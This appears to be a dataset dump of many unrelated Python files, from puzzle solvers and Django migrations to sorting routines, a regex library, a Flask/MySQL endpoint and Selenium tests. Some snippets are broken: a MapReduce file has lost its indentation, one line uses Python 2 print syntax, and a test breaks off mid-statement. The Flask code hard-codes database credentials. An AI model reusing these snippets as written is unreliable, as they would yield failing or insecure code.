text stringlengths 8 6.05M |
|---|
import io
import requests
import zipfile
import shutil
import re
# Solve Python Challenge #6: follow the chain of "Next nothing is N" entries
# inside channel.zip, collecting each zip entry's metadata comment on the way;
# the concatenated comments spell out the final answer.
response = requests.get('http://www.pythonchallenge.com/pc/def/channel.zip')
zf = zipfile.ZipFile(io.BytesIO(response.content))
comments = []
# readme.txt names the first file in the chain.
print(zf.open("readme.txt").readlines())
file_name = "90052.txt"
while True:
    file_output = zf.read(file_name).decode('utf-8')
    # Each entry's zip comment contributes one character of the hidden message.
    comments.append(zf.getinfo(file_name).comment.decode('utf-8'))
    print(file_output)
    match = re.search(r'Next nothing is (\d+)', file_output)
    if match is None:
        # End of the chain (or an unexpected entry format) — stop following.
        print('Error: no next file referenced')
        break
    file_name = f"{match.group(1)}.txt"
print(''.join(comments))
# mocking is a very common testing practice
# faking the output of a function with predefined values
# allows us to write test in a consistent fashion without worrying if an underlying works correctly
from unittest.mock import MagicMock
from daos.book_dao_postgres import BookDaoPostgres
from entities.book import Book
from services.book_service import BookService
# imgaine these are the only three books in my database
from services.book_service_impl import BookServiceImpl
# Fixture data: imagine these are the only three books in the database.
books = [Book(0,'The Lion the Witch and the Wardrobe','doesnt matter',True,0,0),
         Book(0,'War and Peace','doesnt matter',True,0,0),
         Book(0,'Frankenstein','doesnt matter',True,0,0)]
# Mocking get_all_books lets us test BookService without a working DAO/DB.
# NOTE(review): instantiating the real BookDaoPostgres may open a database
# connection in its constructor; a plain MagicMock() would avoid that — confirm.
mock_dao = BookDaoPostgres()
mock_dao.get_all_books = MagicMock(return_value = books)
books = mock_dao.get_all_books()  # calling the mocked method returns the three fixture books
book_service: BookService = BookServiceImpl(mock_dao)


def test_get_by_title_1():
    # Two fixture titles contain "War": "War and Peace" and "...the Wardrobe".
    # NOTE(review): "find_books_by_tile_containing" looks like a typo for
    # "title" — confirm against the BookService interface before renaming.
    result = book_service.find_books_by_tile_containing("War")
    assert len(result) == 2
|
def score(palabra):
    """Return the Scrabble score of *palabra*.

    Letters are valued case-insensitively; a KeyError is raised for any
    character that is not a Scrabble letter (same as the original contract).
    """
    valores = {
        'A': 1, 'E': 1, 'I': 1, 'O': 1, 'U': 1,
        'L': 1, 'N': 1, 'R': 1, 'S': 1, 'T': 1,
        'D': 2, 'G': 2, 'B': 3, 'C': 3, 'M': 3, 'P': 3,
        'F': 4, 'H': 4, 'V': 4, 'W': 4, 'Y': 4, 'K': 5,
        'J': 8, 'X': 8, 'Q': 10, 'Z': 10
    }
    # Summing per character is equivalent to the distinct-letter * count form.
    return sum(valores[letra.upper()] for letra in palabra)
|
class Planet():
    """A node in the orbit tree: each planet orbits at most one parent."""

    def __init__(self, name, parent):
        self.name = name
        self.parent = parent
        self.children = []

    def totalOrbits(self):
        """Return this planet's direct + indirect orbits (its depth in the tree)."""
        depth = 0
        ancestor = self.parent
        while ancestor is not None:
            depth += 1
            ancestor = ancestor.parent
        return depth
def main():
    # Build the orbit tree from the puzzle input, then sum the depth of every
    # node — the "total direct and indirect orbits" checksum (AoC 2019 day 6).
    planetList = registerPlanets()
    orbitCount = 0
    for planet in planetList:
        orbitCount += planet.totalOrbits()
    print(orbitCount)
def registerPlanets():
    """Parse input_Day6.txt (one "BODY)SATELLITE" pair per line) into Planet
    objects linked parent->child, and return the list of all planets.

    Edges may arrive in any order, so each endpoint may or may not already
    be registered; the four if/elif branches cover every combination.
    """
    inputOrbits = open("input_Day6.txt", "r")
    planets = []
    for orbit in inputOrbits:
        # A line "A)B" means B orbits (is a satellite of) A.
        bodyName, planetName = orbit.rstrip().split(")")
        satelite = None
        body = None
        # Linear scan for already-registered endpoints.
        # NOTE(review): O(n) per edge; a dict keyed by name would be O(1).
        for p in planets:
            if planetName == p.name:
                satelite = p
            if bodyName == p.name:
                body = p
        if satelite != None and body != None:
            # Both already known: just link them.
            satelite.parent = body
            body.children.append(satelite)
        elif satelite != None and body == None:
            # Only the satellite known: create its body as a new (rootless) node.
            body = Planet(bodyName, None)
            body.children.append(satelite)
            satelite.parent = body
            planets.append(body)
        elif satelite == None and body != None:
            # Only the body known: create the satellite beneath it.
            satelite = Planet(planetName, body)
            body.children.append(satelite)
            planets.append(satelite)
        elif satelite == None and body == None:
            # Neither known: create both and link them.
            body = Planet(bodyName, None)
            satelite = Planet(planetName, body)
            body.children.append(satelite)
            planets.append(body)
            planets.append(satelite)
    inputOrbits.close()
    return planets


main()
# Generated by Django 3.2 on 2021-04-14 11:01
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated migration: order Role records by name by default."""

    dependencies = [
        ('app', '0002_auto_20210414_1658'),
    ]

    operations = [
        migrations.AlterModelOptions(
            name='role',
            options={'ordering': ['name']},
        ),
    ]
|
import os.path
from sqlalchemy import create_engine
from sqlalchemy.orm import Session
from client.clientmodels import LocalUsers, LocalContacts, MessageHistory
class ClientDatabase:
    """SQLite-backed local storage for one chat client: known users, the
    client's contact list, and per-contact message history."""

    def __init__(self, path, name):
        # One database file per client account, e.g. client_<name>.db3.
        db_path = os.path.join(path, f"client_{name}.db3")
        # check_same_thread=False: the session is shared across client threads.
        engine = create_engine(f'sqlite:///{db_path}', echo=False, pool_recycle=7200,
                               connect_args={'check_same_thread': False})
        # Create the tables on first run; keep existing data otherwise.
        LocalUsers.__table__.create(engine, checkfirst=True)
        LocalContacts.__table__.create(engine, checkfirst=True)
        MessageHistory.__table__.create(engine, checkfirst=True)
        self.local_users = LocalUsers
        self.local_contacts = LocalContacts
        self.message_history = MessageHistory
        self.session = Session(engine)
        self.session.commit()

    def get_users(self):
        """Return all known user names as a flat list of strings."""
        users = self.session.query(self.local_users.name).all()
        return [user[0] for user in users]

    def get_contacts(self):
        """Return all contact names as a flat list of strings."""
        contacts = self.session.query(self.local_contacts.contact_name).all()
        return [contact[0] for contact in contacts]

    def is_contact_exist(self, name):
        """Return True if *name* is in the contact list.

        NOTE(review): duplicates check_contact() below — confirm which one
        callers use before consolidating.
        """
        if self.session.query(self.local_contacts).filter_by(contact_name=name).count():
            return True
        else:
            return False

    def remove_contact(self, name):
        """Delete *name* from the contact list.

        NOTE(review): unlike add_contact, this does not commit — confirm the
        caller commits the session afterwards.
        """
        self.session.query(self.local_contacts).filter_by(contact_name=name).delete()

    def is_user_exists(self, name):
        """Return True if *name* is a known user."""
        if self.session.query(self.local_users).filter_by(name=name).count():
            return True
        else:
            return False

    def add_contact(self, name):
        """Add *name* to the contact list (no-op if it already exists) and commit."""
        if not self.session.query(self.local_contacts).filter_by(contact_name=name).count():
            contact_row = self.local_contacts(name)
            self.session.add(contact_row)
            self.session.commit()

    def add_users(self, users_list):
        """Replace the whole known-users table with *users_list* and commit."""
        self.session.query(self.local_users).delete()
        for name in users_list:
            user_row = self.local_users(name)
            self.session.add(user_row)
        self.session.commit()

    def save_message(self, contact_name, direction, message):
        """Append one message (with its direction) to the history and commit."""
        message_row = self.message_history(contact_name, direction, message)
        self.session.add(message_row)
        self.session.commit()

    def get_history(self, contact_name):
        """Return the message history with *contact_name* as
        (contact_name, direction, message, date) tuples."""
        query = self.session.query(self.message_history).filter_by(contact_name=contact_name)
        history_list = [(item.contact_name, item.direction, item.message, item.date) for item in query.all()]
        return history_list

    def check_contact(self, contact_name):
        """Return True if *contact_name* is in the contact list
        (same behaviour as is_contact_exist)."""
        if self.session.query(self.local_contacts).filter_by(contact_name=contact_name).count():
            return True
        else:
            return False

    def clear_contacts(self):
        """Delete every contact. NOTE(review): does not commit — confirm callers do."""
        self.session.query(self.local_contacts).delete()
|
def info(**nos):
    """Print the type and contents of the received keyword arguments.

    Fix: the original used Python 2 print statements, which are a syntax
    error on Python 3; converted to print() calls.
    """
    print(str(type(nos)))
    print(nos)


info(a=1, b=2, c=3)
|
import numpy as np
def relu(X, deriv=False):
    """Rectified linear unit.

    Forward pass: elementwise max(X, 0). With deriv=True: the boolean mask
    X > 0 (the subgradient of ReLU).

    Fix: the original called np.max(X, 0), which REDUCES along axis 0
    instead of taking the elementwise maximum with zero; np.maximum is the
    correct elementwise call.
    """
    if not deriv:
        return np.maximum(X, 0)
    else:
        return X > 0
def sigmoid(X, deriv=False):
    """Logistic sigmoid; with deriv=True, its derivative s*(1-s) where
    s = sigmoid(X) is recomputed from the forward pass."""
    if deriv:
        fwd = sigmoid(X)
        return fwd * (1 - fwd)
    return 1 / (1 + np.exp(-X))
def tanh(X, deriv=False):
    """Hyperbolic tangent computed from exp(X) and exp(-X); with deriv=True,
    its derivative 1 - tanh(X)**2."""
    if deriv:
        fwd = tanh(X)
        return 1 - fwd ** 2
    pos = np.exp(X)
    neg = 1 / pos
    return (pos - neg) / (pos + neg)
def softmax(X, deriv=False):
    """Softmax normalized along axis 0 (column-wise). The derivative is not
    implemented and raises NotImplementedError."""
    if deriv:
        raise NotImplementedError
    exp = np.exp(X)
    return exp / np.sum(exp, axis=0, keepdims=True)
def get_activation(name):
    """Look up an activation function by name.

    Supported names: 'relu', 'sigmoid', 'tanh', 'softmax'. Raises KeyError
    for anything else.

    Fix: softmax is defined above but was missing from the lookup table.
    """
    return {'relu': relu,
            'sigmoid': sigmoid,
            'tanh': tanh,
            'softmax': softmax}[name]
|
"""
Time/Space complexity = O(N)
"""
# Top Down Approach
from functools import lru_cache
class Solution:
    def rob(self, nums: List[int]) -> int:
        """Return the maximum loot from non-adjacent houses (top-down DP).

        Fix: the original memoized dfs on (val, indx); including the running
        total `val` in the cache key made every call a cache miss, so the
        recursion was exponential. Caching on the index alone restores O(n)
        time and O(n) space.
        """
        if not nums:
            return 0

        @lru_cache(maxsize=None)
        def best(indx):
            # Best total obtainable when `indx` is the next house robbed.
            if indx >= len(nums):
                return 0
            # After robbing indx, the next robbed house is indx+2 or indx+3;
            # gaps of 4+ never help because values are non-negative.
            return nums[indx] + max(best(indx + 2), best(indx + 3))

        # The first robbed house is either house 0 or house 1.
        return max(best(0), best(1))
# Bottom UP
from functools import lru_cache
class Solution:
    def rob(self, nums: List[int]) -> int:
        """Return the maximum loot from non-adjacent houses (bottom-up DP,
        O(n) time, O(n) space)."""
        if not nums:
            return 0
        best = [0] * len(nums)
        for idx, value in enumerate(nums):
            # Either rob this house (plus the best two houses back),
            # or skip it and keep the previous best.
            take = value + (best[idx - 2] if idx >= 2 else 0)
            skip = best[idx - 1] if idx >= 1 else 0
            best[idx] = max(take, skip)
        return best[-1]
|
import MapReduce
import sys
"""
Join input from two tables
"""
mr = MapReduce.MapReduce()
# =============================
# Do not modify above this line
def mapper(record):
# 0: table name
# 1: order id
# 2+: data
mr.emit_intermediate(record[1], record)
def reducer(key, list_of_values):
list_of_values.sort()
order = list_of_values.pop(-1)
for line_item in list_of_values:
mr.emit(order + line_item)
# Do not modify below this line
# =============================
if __name__ == '__main__':
inputdata = open(sys.argv[1])
mr.execute(inputdata, mapper, reducer)
|
# Generated by Django 2.2.5 on 2019-10-12 04:26
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated migration: drop the NumID, Doctores, Nutriologos and
    Usuarios models.

    NumID's foreign-key fields are removed first so that the models they
    reference can be deleted safely.
    """

    dependencies = [
        ('gestiondeusuarios', '0004_auto_20191010_1255'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='numid',
            name='Doctores',
        ),
        migrations.RemoveField(
            model_name='numid',
            name='Nutriologos',
        ),
        migrations.RemoveField(
            model_name='numid',
            name='Usuarios',
        ),
        migrations.DeleteModel(
            name='Doctores',
        ),
        migrations.DeleteModel(
            name='NumID',
        ),
        migrations.DeleteModel(
            name='Nutriologos',
        ),
        migrations.DeleteModel(
            name='Usuarios',
        ),
    ]
|
from selenium import webdriver
import time
def checkWelcome():
    """Log in to the OrangeHRM demo site, verify the welcome text, log out.

    NOTE(review): find_element_by_* is the pre-Selenium-4 API (removed in
    Selenium 4), and the chromedriver path and demo credentials are
    hard-coded — confirm the pinned selenium version before reusing.
    """
    url = 'https://opensource-demo.orangehrmlive.com/index.php/auth/login'
    location = '../drivers/'
    driver = webdriver.Chrome(executable_path=location + 'chromedriver.exe')
    driver.get(url)
    time.sleep(2)
    driver.find_element_by_name('txtUsername').send_keys('Admin')
    driver.find_element_by_name('txtPassword').send_keys('admin123')
    driver.find_element_by_name('Submit').click()
    welcomeText = driver.find_element_by_id('welcome').text
    print(welcomeText)
    # A successful login shows a greeting containing "Welcome".
    assert "Welcome" in welcomeText
    driver.find_element_by_id("welcome").click()
    driver.find_element_by_link_text("Logout").click()


# checkWelcome()
|
#!python
def merge(list1, list2):
    """Merge two lists, each assumed to already be sorted, into a new list
    containing all items in sorted order.

    Running time: O(n + m) — each element is visited exactly once.
    Memory usage: O(n + m) for the result list; the inputs are not mutated.

    Fix: the original performed a single comparison and returned after
    appending at most two elements instead of looping until both inputs
    were exhausted.
    """
    merged = []
    i = j = 0
    # Repeatedly take the smaller head element until one list runs out.
    while i < len(list1) and j < len(list2):
        if list1[i] <= list2[j]:
            merged.append(list1[i])
            i += 1
        else:
            merged.append(list2[j])
            j += 1
    # Exactly one of these is non-empty: the leftover tail is already sorted.
    merged.extend(list1[i:])
    merged.extend(list2[j:])
    return merged
def split_sort_merge(unsplit_list):
    """Sort items by splitting the list into two approximately equal halves,
    sorting each half with an iterative algorithm (Timsort via sorted()),
    and merging the results into a new sorted list.

    Running time: O(n log n) for the half-sorts plus O(n) for the merge.
    Memory usage: O(n) for the halves and the merged result.

    Fixes: the original used `index =+ 1` (which assigns +1, looping
    forever), never sorted the halves, and returned nothing.
    """
    middle = len(unsplit_list) // 2
    first_half = sorted(unsplit_list[:middle])
    second_half = sorted(unsplit_list[middle:])
    # Standard two-pointer merge of the two sorted halves.
    merged = []
    i = j = 0
    while i < len(first_half) and j < len(second_half):
        if first_half[i] <= second_half[j]:
            merged.append(first_half[i])
            i += 1
        else:
            merged.append(second_half[j])
            j += 1
    merged.extend(first_half[i:])
    merged.extend(second_half[j:])
    return merged
def merge_sort(items):
    """Sort *items* by recursive merge sort and return a new sorted list.

    Running time: O(n log n) in all cases.
    Memory usage: O(n) extra for the merged sublists (plus O(log n) stack).

    Fix: the original referenced an undefined name (unsplit_list), had the
    `index =+ 1` assignment bug, and never recursed, sorted, or returned.
    """
    # Base case: zero or one element is already sorted.
    if len(items) <= 1:
        return list(items)
    middle = len(items) // 2
    left = merge_sort(items[:middle])
    right = merge_sort(items[middle:])
    return _merge_sorted(left, right)


def _merge_sorted(left, right):
    """Merge two sorted lists into one new sorted list in O(len(left) + len(right))."""
    result = []
    i = j = 0
    while i < len(left) and j < len(right):
        if left[i] <= right[j]:
            result.append(left[i])
            i += 1
        else:
            result.append(right[j])
            j += 1
    result.extend(left[i:])
    result.extend(right[j:])
    return result
###############################################################
##### What is partition?: It is separating something in smaller groups
#####
def partition(items, low, high):
    """Return index `p` after in-place partitioning items in range
    [low...high].

    Pivot choice: the last element of the range, items[high] (Lomuto
    scheme). Afterwards items[low...p-1] are less than the pivot, the pivot
    sits at index p, and items[p+1...high] are greater than or equal to it.

    Running time: O(high - low) — one pass over the range.
    Memory usage: O(1) — swaps in place.

    Fix: the original was a stub that only computed an unused pivot index.
    """
    pivot = items[high]
    p = low
    for i in range(low, high):
        if items[i] < pivot:
            # Grow the "less than pivot" prefix by one.
            items[i], items[p] = items[p], items[i]
            p += 1
    # Drop the pivot into its final position.
    items[p], items[high] = items[high], items[p]
    return p
def quick_sort(unsorted_list, low=None, high=None):
    """Sort *unsorted_list* in place by partitioning [low...high] around a
    pivot and recursively sorting each remaining sublist range.

    Best case running time: O(n log n) with balanced partitions.
    Worst case running time: O(n^2) on already-sorted input, because the
    pivot is the last element of the range.
    Memory usage: O(log n) recursion depth on average, O(n) worst case.

    Fix: the original was incomplete (a loop with no body — a syntax error)
    and never sorted anything.
    """
    # Default bounds cover the whole list on the initial call.
    if low is None:
        low = 0
    if high is None:
        high = len(unsorted_list) - 1
    # Ranges of fewer than two elements are already sorted (base case).
    if low >= high:
        return
    p = _lomuto_partition(unsorted_list, low, high)
    quick_sort(unsorted_list, low, p - 1)
    quick_sort(unsorted_list, p + 1, high)


def _lomuto_partition(items, low, high):
    """Lomuto partition of items[low...high] around items[high]; return the
    pivot's final index."""
    pivot = items[high]
    p = low
    for i in range(low, high):
        if items[i] < pivot:
            items[i], items[p] = items[p], items[i]
            p += 1
    items[p], items[high] = items[high], items[p]
    return p
|
import os
import sys
from functools import partial
import pymel.core as pm
import maya.cmds as cmds
import maya.mel as mel
def findAllFiles(fileDirectory, fileExtension):
    """Return the names (extension stripped) of files in *fileDirectory*
    whose names end with *fileExtension*."""
    matching = []
    for entry in os.listdir(fileDirectory):
        stem, found, trailing = str(entry).rpartition(fileExtension)
        # rpartition locates the LAST occurrence of the extension; it only
        # counts when the extension is present (found) and nothing follows it
        # (the name ends with the extension).
        if found and not trailing:
            matching.append(stem)
    return matching
# Print the even numbers from 100 down to 2, one per line.
print(*range(100, 1, -2), sep="\n")
'''
Regular Expression Library used by Shorthand.
'''
# General

# Matches a valid Date Stamp (YYYY-MM-DD shaped)
# NOTE(review): the month field is [0-3][0-9], which also accepts values like
# 00 or 39 — confirm this looseness is intentional.
DATE_STAMP_PATTERN = r'[1-2][0-9]{3}\-[0-3][0-9]\-[0-3][0-9]'
# Matches a valid Date Stamp within parentheses
START_STAMP_PATTERN = r'\(' + DATE_STAMP_PATTERN + r'\)'
# Matches two valid Date Stamps within parentheses with an arrow between
END_STAMP_PATTERN = r'\(' + DATE_STAMP_PATTERN + r' -> ' + \
                    DATE_STAMP_PATTERN + r'\)'

# To-Dos

# Matches all valid prefixes for incomplete, complete, or skipped todos
# NOTE(review): the trailing class [a-zA-Z1-9\(\)] excludes '0' — confirm a
# todo may not begin with a zero.
CATCH_ALL_PATTERN = r'(^\s*)([-+*] )(\[[XS ]?\])( [a-zA-Z1-9\(\)])'
# Matches all incomplete todos with valid timestamps
VALID_INCOMPLETE_PATTERN = r'[-+*] \[ \] ' + START_STAMP_PATTERN
# Matches all completed or skipped todos with valid start and end timestamps
VALID_COMPLETE_PATTERN = r'[-+*] \[[XS]\] ' + END_STAMP_PATTERN
# Matches incomplete todos without a valid start timestamp
UNFINISHED_UNSTAMPED_PATTERN = r'(^\s*)([-+*] )(\[ ?\]) (?!' + \
                               START_STAMP_PATTERN + r')'
# Matches completed or skipped todos with only the start timestamp
FINISHED_START_STAMPED_PATTERN = r'(^\s*)([-+*] )(\[)([XS])(\] )(\()(' + \
                                 DATE_STAMP_PATTERN + r')(\)) '
# Matches completed or skipped todos with no valid timestamp
FINISHED_UNSTAMPED_PATTERN = r'(^\s*)([-+*] )(\[)([XS])(\] )(?!(' + \
                             START_STAMP_PATTERN + r'|' + \
                             END_STAMP_PATTERN + r'))'
# Matches the prefix of a skipped todo
SKIPPED_PREFIX_GREP = r'(^\s*)([-+*] )(\[S\])( [a-zA-Z1-9\(\)])'
# Matches the prefix of an incomplete todo
INCOMPLETE_PREFIX_GREP = r'(^\s*)([-+*] )(\[ ?\])( [a-zA-Z1-9\(\)])'
# Matches the prefix of a complete todo
COMPLETE_PREFIX_GREP = r'(^\s*)([-+*] )(\[X\])( [a-zA-Z1-9\(\)])'
# Matches a start stamp and todo without the prefix
START_STAMP_ONLY_PATTERN = r'(\()(' + DATE_STAMP_PATTERN + r')(\))( )(.*)'
# Matches an end stamp and todo without the prefix
START_END_STAMP_ONLY_PATTERN = r'(\()(' + DATE_STAMP_PATTERN + r')( -> )(' + \
                               DATE_STAMP_PATTERN + r')(\))( )(.*)'

# Questions & Answers

# Matches either a question ('? ') or answer ('@ ') bullet
QUESTION_OR_ANSWER = r'(^\s*)([-+*] )([\?@] )(.*)'
# Matches a question
ALL_QUESTIONS = r'(^\s*)([-+*] )(\? )(.*)'
UNSTAMPED_QUESTION = r'(^\s*)([-+*] )(\? )(?!' + START_STAMP_PATTERN + r' )'
STAMPED_QUESTION = r'\? ' + START_STAMP_PATTERN + r' '
# Matches an answer
ANSWER_PATTERN = r'(^\s*)([-+*] )(@ )(.*)'
UNSTAMPED_ANSWER = r'(^\s*)([-+*] )(@ )(?!' + START_STAMP_PATTERN + r' )'
STAMPED_ANSWER = r'(@ )(\()' + DATE_STAMP_PATTERN + r'(\)) '

# Matches a today placeholder
TODAY_GREP = r'"\\\today"'
TODAY_LINE_PATTERN = r'(.*)(\\today)(.*)'
# Matches a tag
TAG_FILTER = r'( :\w+:)'
TAG_PATTERN = r'( :\w+:)($|(?= ))'
# Matches a definition
DEFINITION_PATTERN = r"^(\s*)([-+*] )(\{[\-_+&*:()/\\p{L}' \w]*?\} )(.*)"
# Matches any heading
HEADING_PATTERN = r'^(#+)( )(.*)'
# Matches any heading which ends with a datestamp
DATED_HEADING_PATTERN = r'^(#+)( )(.*)(' + DATE_STAMP_PATTERN + r')'
# Matches the beginning of a record set
RECORD_SET_PATTERN = r'^```rec-data$'
# Matches any link
LINK_PATTERN = r'\s\[.*?\]\(.*?\)'
ALL_LINK_PATTERN = r'\s(\[[^\[]*?\]\()(.*?)(\))'
# Matches a link to another note (any target not starting with http(s)://)
INTERNAL_LINK_PATTERN = r'(\s)(\[[^\[]*?\]\()((?!(https://|http://)).*?)(\))'
# Matches any Image
IMAGE_PATTERN = r'!\[(.*?)\]\((.*?)\)'
# Matches a GPS location: GPS[lat, lon] with an optional trailing label
GPS_PATTERN = r"(GPS\[)(-?1?\d{1,2}\.\d{3,6})(, ?)"\
              r"(-?1?\d{1,2}\.\d{3,6})(, ?)?([\w ]+)?(\])"
# Characters that must be backslash-escaped before shell use.
CHARS_TO_ESCAPE = ['`']


def escape_for_cli(input_pattern):
    '''Patterns which include special characters must
    be escaped before being used on the command line
    '''
    escaped_chars = []
    for character in input_pattern:
        if character in CHARS_TO_ESCAPE:
            escaped_chars.append('\\' + character)
        else:
            escaped_chars.append(character)
    return ''.join(escaped_chars)
|
# Print an n-row right-shifted triangle of space-separated '*' characters.
n=int(input('Enter the no. of lines'))
for i in range(0,n):
    # Row i is indented by i leading spaces.
    for a in range(0,i):
        print(' ',end=" ")
    # The remaining n-i columns are stars.
    for j in range(i,n):
        print("*",end=" ")
    print('')
|
from flask import Flask
from flask import Blueprint
from flask import request
from flask import jsonify
from flaskext.mysql import MySQL
from flask_cors import CORS, cross_origin
# Flask + MySQL service exposing an insert endpoint for the "facultad" table.
app= Flask(__name__)
mysql=MySQL()
# NOTE(review): credentials are hard-coded; 'admi' looks like a typo for
# 'admin' — confirm, and prefer environment variables for secrets.
app.config['MYSQL_DATABASE_USER'] ='root'
app.config['MYSQL_DATABASE_PASSWORD'] ='admi'
app.config['MYSQL_DATABASE_DB'] ='proyecto'
app.config['MYSQL_DATABASE_HOST'] ='127.0.0.1'
mysql.init_app(app)
# NOTE(review): a single module-level connection/cursor is shared by every
# request — not safe under concurrent requests; confirm the deployment model.
conn =mysql.connect()
cursor=conn.cursor()
# Change this blueprint per table
facultad_blueprint = Blueprint('facultad_blueprint', __name__)


# CHANGE for each table (2)
@facultad_blueprint.route('/create_facultad',methods=['POST'])
def create_facultad():
    """Insert a new facultad row from the JSON request body and echo it back."""
    print(request.json)
    params={
        'idfacultad':request.json['idfacultad'],
        'nombre': request.json['nombre'],
        'escuela_idescuela':request.json['escuela_idescuela'],
    }
    # Parameterized insert (safe from SQL injection); change per table
    query="""insert into facultad (idfacultad, nombre,escuela_idescuela)
values (%(idfacultad)s, %(nombre)s,%(escuela_idescuela)s)"""
    cursor.execute(query,params)
    conn.commit()
    content={'idfacultad':params['idfacultad'],
             'nombre':params['nombre'],
             'escuela_idescuela':params['escuela_idescuela']}
    return jsonify(content)
# In[1]:
import pandas as pd

# In[3]:
# Brazilian (sudeste) weather data: keep only the date and temperature columns.
df_brazil = pd.read_csv("sudeste.csv", usecols=["date", "temp"])

# In[5]:
# Madrid weather data: CET is the date column, Mean TemperatureC the daily mean.
df_madrid = pd.read_csv("weather_madrid_LEMD_1997_2015.csv", usecols=["CET", "Mean TemperatureC"])

# In[12]:
# Collapse multiple Brazilian readings per day into a single daily mean.
df_brazil_no_dup_date = df_brazil.groupby("date").mean().reset_index()

# In[14]:
# Inner-join the two datasets on matching calendar dates.
df_final = pd.merge(df_brazil_no_dup_date, df_madrid, how="inner", left_on="date", right_on="CET")

# In[17]:
df_final = df_final[["date", "temp", "Mean TemperatureC"]]

# In[19]:
df_final.columns = ["date", "temp_brazil", "temp_madrid"]

# In[21]:
# Pearson correlation between the two cities' daily mean temperatures.
df_final[["temp_brazil", "temp_madrid"]].corr()

# In[22]:
# Brazil and Madrid average daily temperatures have a negative correlation of -0.03 but that can be ignored.
# As a result one can say Brazil and Madrid average daily temperatures are independent of each other.
"""
Copyright Matt DeMartino (Stravajiaxen)
Licensed under MIT License -- do whatever you want with this, just don't sue me!
This code attempts to solve Project Euler (projecteuler.net) Problem #15 Lattice paths
Starting in the top left corner of a 2x2 grid, and only being able to move to the
right and down, there are exactly 6 routes to the bottom right corner.
How many such routes are there through a 20x20 grid?
"""
import time
def main():
    """Project Euler #15: count monotone lattice paths through a 20x20 grid."""
    # solns[(i, j)] caches the number of routes through an i-by-j grid;
    # None marks a not-yet-computed entry.
    solns = {(i, j): None for i in range(1, 21) for j in range(1, 21)}
    # Base cases: a 1-wide (or 1-tall) grid of length i has exactly i+1 routes.
    for i in range(1, 21):
        solns[(i, 1)] = i + 1
        solns[(1, i)] = i + 1

    def solns_for(i, j):
        # Memoized recurrence: routes(i, j) = routes(i-1, j) + routes(i, j-1).
        cached = solns[(i, j)]
        if cached is not None:
            return cached
        if i == 1:
            solns[(i, j)] = j + 1
        elif j == 1:
            solns[(i, j)] = i + 1
        else:
            solns[(i, j)] = solns_for(i - 1, j) + solns_for(i, j - 1)
        return solns[(i, j)]

    print(solns_for(20, 20))


if __name__ == "__main__":
    start_time = time.time()
    main()
    elapsed_time = time.time() - start_time
    print("Elapsed Time: ", elapsed_time)
|
#!/usr/bin/env python
import subprocess
import sys
import os
def main():
    """Recursively delete .pyc files (and generated .py files under any
    build_setup_py directory) below a directory.

    Usage: script [directory]; defaults to the current directory.
    Raises ValueError when more than one argument is given.

    Fix: the original compared ints with `is` (identity, not equality) —
    fragile and a SyntaxWarning on modern Python; use == instead. The bare
    ValueError also gained a usage message.
    """
    if len(sys.argv) == 1:
        wd = '.'
    elif len(sys.argv) == 2:
        wd = sys.argv[1]
    else:
        raise ValueError('usage: %s [directory]' % sys.argv[0])
    count = 0
    for root, dirs, files in os.walk(wd):
        for file in files:
            path = os.path.join(root, file)
            if file.endswith('.pyc'):
                os.remove(path)
                count += 1
            # Generated sources under a build_setup_py directory are also junk.
            if 'build_setup_py' in root and file.endswith('.py'):
                os.remove(path)
                count += 1
    print('removed', count, '.pyc and build/*.py files')


if __name__ == '__main__':
    main()
|
from django.apps import AppConfig
class HappyTeamConfig(AppConfig):
    """Django application configuration for the happy_team app."""
    name = 'happy_team'
|
print"Hello Github!"
|
import sqlite3
# Dump every row of the wordCount table from the local SQLite database file.
# NOTE(review): the connection and cursor are never closed, and the query
# fails if wordCount.db has no wordCount table — confirm setup expectations.
conn = sqlite3.connect('wordCount.db')
cursor = conn.cursor()
print("Connected")
sql = '''select * from wordCount'''
results = cursor.execute(sql)
all_words = results.fetchall()
for word in all_words:
    print(word)
from selenium import webdriver
from unittest import TestCase, main
from pyvirtualdisplay import Display
class TestClass(TestCase):
    """Browser smoke tests for congressand.me: page titles, headings, and
    navbar branding on each top-level page.

    NOTE(review): the virtual display and Firefox instance start at
    class-definition (import) time and are shared by every test; they are
    only cleaned up by module-level code after main() returns — confirm
    that cleanup actually runs under unittest's default sys.exit behavior.
    """

    display = Display(visible=0, size=(800, 600))
    display.start()
    browser = webdriver.Firefox()

    # --- page titles ---
    def test_0(self):
        self.browser.get("https://congressand.me")
        self.assertEqual(self.browser.title, "Congress and Me")

    # --- page-title headings on each listing page ---
    def test_1(self):
        self.browser.get("https://congressand.me/representatives/page/1")
        self.browser.implicitly_wait(3)
        home_page = self.browser.find_element_by_class_name("page-title")
        self.assertEqual(home_page.text, "Representatives")

    def test_2(self):
        self.browser.get("https://congressand.me/states/page/1")
        self.browser.implicitly_wait(3)
        home_page = self.browser.find_element_by_class_name("page-title")
        self.assertEqual(home_page.text, "States")

    def test_3(self):
        self.browser.get("https://congressand.me/issues/page/1")
        self.browser.implicitly_wait(3)
        home_page = self.browser.find_element_by_class_name("page-title")
        self.assertEqual(home_page.text, "Issues")

    def test_4(self):
        self.browser.get("https://congressand.me/about")
        self.assertEqual(self.browser.title, "Congress and Me")

    # --- navbar brand text on each page ---
    def test_5(self):
        self.browser.get("https://congressand.me/representatives/page/1")
        self.browser.implicitly_wait(3)
        home_page = self.browser.find_element_by_class_name("navbar-brand")
        self.assertEqual(home_page.text, "Congress and Me")

    def test_6(self):
        self.browser.get("https://congressand.me/states/page/1")
        self.browser.implicitly_wait(3)
        home_page = self.browser.find_element_by_class_name("navbar-brand")
        self.assertEqual(home_page.text, "Congress and Me")

    def test_7(self):
        self.browser.get("https://congressand.me/issues/page/1")
        self.browser.implicitly_wait(3)
        home_page = self.browser.find_element_by_class_name("navbar-brand")
        self.assertEqual(home_page.text, "Congress and Me")

    def test_8(self):
        self.browser.get("https://congressand.me/")
        self.browser.implicitly_wait(3)
        home_page = self.browser.find_element_by_class_name("navbar-brand")
        self.assertEqual(home_page.text, "Congress and Me")

    def test_9(self):
        self.browser.get("https://congressand.me/about")
        self.browser.implicitly_wait(3)
        home_page = self.browser.find_element_by_xpath("/html/body/div/nav/a")
        self.assertEqual(home_page.text, "")

    # --- page copy ---
    def test_10(self):
        self.browser.get("https://congressand.me/")
        self.browser.implicitly_wait(3)
        home_page = self.browser.find_element_by_class_name("text-justify")
        self.assertEqual(
            home_page.text,
